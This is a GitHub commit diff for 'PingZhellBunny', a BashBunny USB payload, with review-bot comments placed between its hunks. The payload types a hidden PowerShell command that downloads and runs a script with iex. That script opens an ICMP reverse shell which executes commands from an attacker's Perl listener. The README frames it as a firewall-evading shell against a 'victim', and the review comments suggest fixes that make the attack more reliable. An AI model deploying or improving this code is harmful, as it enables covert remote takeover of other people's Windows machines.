Merge pull request #560 from 0iphor13/master

Updated PingZhellBunny
This commit is contained in:
hak5glytch 2022-10-20 10:36:29 -07:00 committed by GitHub
commit afc3ac3478
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
5 changed files with 58 additions and 121 deletions


@ -15,7 +15,7 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by 0iphor13 for PingZhell
# Modified by 0iphor13 for PingZhellBunny
#
#
#
@ -29,7 +29,7 @@ use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
use Net::RawIP;
use Fcntl;
print "Bunny waitin' for connection...\n";
print "Loading PingZhellBunny...\n";
# create raw socket
my $sock = IO::Socket::INET->new(
@ -40,8 +40,16 @@ my $sock = IO::Socket::INET->new(
# set stdin to non-blocking
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
print "Let's wait for PingZhell!\n";
#Unnecessary print output - just for fun
sleep(2);
print ". .\n";
sleep(1);
print ". . .";
sleep(1);
print ". . . .";
sleep(2);
print "PingZhellBunny client ready!\n";
my $input = '';
while(1) {
if ($sock->recv(my $buffer, 4096, 0)) {
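Review bot: The `print ". . .";` and `print ". . . .";` lines added in the last hunk have no trailing newline and nothing sets `$|`, so on a terminal (where Perl's STDOUT is normally line-buffered) the dots sit in the buffer through the `sleep(1)` pauses and only appear when `print "PingZhellBunny client ready!\n";` flushes them — add `$| = 1;` ahead of the sequence, or end each print with `\n`, if the countdown is meant to be visible. The six seconds of cosmetic sleeping happen after the raw socket is created, so echo requests arriving in that window should queue in the kernel rather than be lost, but that is worth confirming on the Bunny itself since the banner now says "ready" well after the socket is actually open. The `while(1)` receive loop begins at the hunk's final lines and continues outside it.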


@ -1,86 +0,0 @@
<#
Original script by nishang - modified by 0iphor13 for PingZhell
Use bunny.pl as a master
When running the master, don't forget to disable ICMP replies by the OS. For example:
$: sysctl -w net.ipv4.icmp_echo_ignore_all=1
Then:
$: perl bunny.pl
Microsoft please don't block, oh dear microsoft corporation
#>
$IPAddress = 'Attacker-IP'
$Delay = 5
$BufferSize = 128
#Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
$ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping
$PingOptions = New-Object System.Net.NetworkInformation.PingOptions
$PingOptions.DontFragment = $True
$MicrosoftCopyright =@"
_______ ___ __ _ _______ _______ __ __ _______ ___ ___
| | | | | | | | | | | | | | |
| _ | | |_| | ___|____ | |_| | ___| | | |
| |_| | | | | __ ____| | | |___| | | |
| ___| | _ | || | ______| | ___| |___| |___
| | | | | | | |_| | |_____| _ | |___| | |
|___| |___|_| |__|_______|_______|__| |__|_______|_______|_______|
Windows PowerShell running as user $env:username on $env:computername `n
"@;
# Copyright Copies Right
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright)
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
#Does a german penguin just PingUin?
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
while ($true)
{
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('')
$reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions)
if ($reply.Buffer)
{
$response = ([text.encoding]::ASCII).GetString($reply.Buffer)
$result = (Invoke-Expression -Command $response 2>&1 | Out-String )
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result)
$index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize)
$i = 0
#Fragmant larger output into smaller ones to send to the server.
if ($NeverGonnaGiveYouUp.length -gt $BufferSize)
{
while ($i -lt $index )
{
$NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
$i +=1
}
$remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize
if ($remainingindex -ne 0)
{
$NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)]
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
}
}
else
{
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
}
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
}
else
{
Start-Sleep -Seconds $Delay
}
}


@ -0,0 +1,10 @@
$Delay=5;
$BufferSize=128;
$ICMPBunny=New-Object System.Net.NetworkInformation.Ping;
$PingBB=New-Object System.Net.NetworkInformation.PingOptions;
$PingBB.DontFragment = $True;$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('Bunny@PS '+(gl).Path+'> ');
$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null;while ($true){$NeverGonnaGiveYouUp=([text.encoding]::ASCII).GetBytes('');
$reply=$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);
$result=(Invoke-eXprEssIon -Command $response 2>&1 | Out-String );$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($NeverGonnaGiveYouUp.length/$BufferSize);$i = 0;if($NeverGonnaGiveYouUp.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null;$i +=1;};
$remainingindex=$NeverGonnaGiveYouUp.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null}}else{$ICMPBunny.Send($IP,60 * 10000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null};$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nO.MG@PS " + (pwd).Path + '> ');
$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null}else{Start-Sleep -Seconds $Delay}}
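Review bot: `$IP` is never assigned anywhere in this script; it only works because payload.txt types `$IP = '0.0.0.0';` into the same session first, so running PingZhellBunny.ps1 on its own makes `$ICMPBunny.Send($IP, ...)` fail — a guard at the top such as `if (-not $IP) { throw 'Set $IP to the listener address before running' }` makes that dependency explicit. `Invoke-eXprEssIon -Command $response` executes whatever bytes come back in the echo reply with no authentication or integrity check, and since ICMP has no session state, any host able to land a forged reply (presumably one matching the id/sequence .NET's Ping expects) would get the same command execution as the operator; that is inherent to the technique, but the README should state it as a caveat rather than leaving it implicit. The prompt strings also disagree with each other: the initial send uses `'Bunny@PS '` while the post-command prompt uses `O.MG@PS`, which looks like a leftover from another variant — pick one.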


@ -1,19 +1,19 @@
**Title: PingZhellBunny**
Author: 0iphor13
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.5<br>
Version: 1.3
What is PingZhellBunny?
**What is PingZhellBunny?**
#
*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
*ICMP stands for Internet Control Message Protocol; it is used by network devices query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
*The client ICMP agent (Bunny.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
*The server ICMP Agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhell.ps1) and sends it commands to execute.*
*The client ICMP agent listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
*The server ICMP agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhellBunny input) and sends it commands to execute.*
#
There you go, a reverse shell.
There you go, a reverse shell without the usage of ports.
**Instruction:**
@ -26,16 +26,16 @@ Install dependencies, if needed:
Disable ICMP replies by the OS:
`sysctl -w net.ipv4.icmp_echo_ignore_all=1`
Start Bunny.pl -> perl Bunny.pl
#
!!!Insert the IP of your attacking machine into PingZhell.ps1!!!
#
<p>Plug in Bashbunny with PingZhellBunny equipped.<br>
Start the client -> `perl Bunny.pl`
<p>!!!Insert the IP of your attacking machine into the payload.txt variable $IP & Load PingZhellBunny.ps1 onto your Bunny!!!<br>
<p>Plug in your BashBunny.<br>
Achieve reverse shell.<br>
run away <3</p>
Credit for code and ideas:
- bdamele
- samratashok
- Nikhil Mittal
- krabelize


@ -1,39 +1,44 @@
#!/bin/bash
#
# Title: PingZhellBunny
# Description: Get remote access using a icmp reverse shell.
# Description: Getting remote access via ICMP
# Author: 0iphor13
# Version: 1.3
# Version: 1.5
# Category: Remote_Access
# Attackmodes: HID, Storage
# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
Q DELAY 500
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
DUCKY_LANG de
GET HOST_IP
Q DELAY 500
cd /root/udisk/payloads/$SWITCH_POSITION/
ATTACKMODE HID STORAGE
# starting server
LED SPECIAL
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
LED STAGE1
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#After you have adapted the delays for your target, add "-W hidden"
#Opens hidden powershell instance
Q DELAY 1500
RUN WIN "powershell -Exec Bypass -NoP -NonI"
Q GUI r
Q DELAY 500
Q STRING "powershell -NoP -NonI -w h"
Q DELAY 500
Q ENTER
Q DELAY 1000
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')"
Q DELAY 3000
Q DELAY 500
#Insert attacking IP
Q STRING "\$IP = '0.0.0.0';"
Q DELAY 250
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/PingZhellBunny.ps1\")"
Q DELAY 400
Q ENTER
Q DELAY 1000
ATTACKMODE HID
LED FINISH
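Review bot: `DUCKY_LANG de` hard-codes a German keyboard layout, and it appears to carry over unchanged into the new file; on a target with any other layout the typed `$IP = '0.0.0.0';` and `iex (New-Object Net.WebClient).DownloadString(...)` lines come out with mistranslated `'`, `\` and `:` characters and the stage never runs, so put the layout in a clearly commented variable near the top (e.g. `# change to match the target keyboard` above `DUCKY_LANG de`) and mention it in the README. The comment `#After you have adapted the delays for your target, add "-W hidden"` now sits next to `Q STRING "powershell -NoP -NonI -w h"`, which already opens the window hidden, so if that comment is still present on the new side it is stale and should be dropped or reworded. The `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule is appended on every plug-in and never removed, which is harmless but accumulates duplicates across runs; `iptables -C OUTPUT -p udp --dport 53 -j DROP 2>/dev/null || iptables -A OUTPUT -p udp --dport 53 -j DROP` avoids that.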